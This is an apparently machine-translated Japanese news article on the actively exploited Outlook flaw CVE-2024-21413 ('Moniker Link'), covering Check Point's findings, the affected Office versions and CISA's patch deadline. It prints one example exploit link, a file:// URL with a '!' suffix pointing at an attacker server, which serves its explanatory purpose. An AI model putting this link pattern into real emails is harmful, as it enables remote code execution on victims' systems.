サイバーセキュリティ会社のチェックポイントは、Microsoft Outlookの重要なリモートコード実行(RCE)の脆弱性を発見しました。これは現在、アクティブなサイバー攻撃で悪用されており、世界中の組織に大きな脅威をもたらしています。
これにより、サイバーセキュリティおよびインフラストラクチャセキュリティ局(CISA)が、米国連邦機関に、そのような継続的な攻撃に対してシステムを保護するよう警告するように促されました。
チェックポイントの脆弱性研究者Haifei Liは、次のように追跡される高感度RCEの脆弱性を発見しましたCVE-2024–21413(CVSSスコア9.8)。
この欠陥は、不適切な入力検証から生じます。これにより、脆弱なMicrosoft Outlookバージョンを使用して悪意のあるリンクを使用して電子メールを開くときにコード実行をトリガーできます。
この脆弱性の搾取を成功させることで、脅威アクターがオフィスで保護されたビューをバイパスし、保護されたモードではなく編集モードで悪意のあるファイルを開くことができます。
また、データを読み取り、書き込み、削除する能力を含む、脅威アクターに高度な特権を付与する可能性があります。
Microsoftは、1年前にCVE-2024–21413の脆弱性に取り組んでおり、プレビューペイン自体が攻撃ベクターになる可能性があることを警告しています。
その結果、Outlook内で悪意のあるメールを表示するだけでも、エクスプロイトをトリガーするのに十分な場合があり、非常に危険です。
Check Pointによると、攻撃者はMoniker Linkと呼ばれる脆弱性を活用しています。これは、Outlookをだまして安全でないファイルを開く方法です。
これにより、脅威アクターは、ファイル:// Protocolを使用して、電子メールに埋め込まれた悪意のあるリンクの組み込みの外観保護をバイパスできます。
攻撃者は、感嘆符を付けた後、ファイルURLに任意のテキストを追加することにより、悪意のあるファイルを信頼できるリソースとして扱うためにOutlookを操作できます。
攻撃者が制御するサーバーを指しているURLのファイル拡張機能の直後にこの感嘆符を挿入することにより、ランダムなテキストとともに、システムを欺き、悪意のあるペイロードを実行できます。
たとえば、攻撃者は以下に示すようにリンクを作成する場合があります。
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>私をクリックしてください</a>
被害者がリンクをクリックすると、Outlookは攻撃者のサーバーからファイルを取得し、特権を高めて実行し、システムに対する攻撃者の制御を許可します。
CVE-2024-21413の脆弱性は、Microsoft Office LTSC 2021、Microsoft 365 Apps for Enterprise、Microsoft Outlook 2016、Microsoft Office 2019など、複数のMicrosoft Office製品に影響を与えています。
この脆弱性の積極的な搾取に応じて、CISAは既知の搾取された脆弱性(KEV)カタログにCVE-2024-21413を追加しました。
2021年11月の拘束力のある運用指令(BOD)22-01によれば、連邦政府機関は2025年2月27日まで時間を与えられ、システムのパッチを適用し、潜在的な脅威からネットワークを保護しています。
「これらのタイプの脆弱性は、悪意のあるサイバーアクターの頻繁な攻撃ベクトルであり、連邦企業に重大なリスクをもたらします」とサイバーセキュリティエージェンシー警告した木曜日。
野生での積極的な搾取により、CVE-2024-21413は、ユーザーを見通して深刻なセキュリティリスクをもたらします。
したがって、民間組織は、潜在的な違反を防ぐために、パッチを直ちに適用し、サイバーセキュリティ防御を強化することをお勧めします。
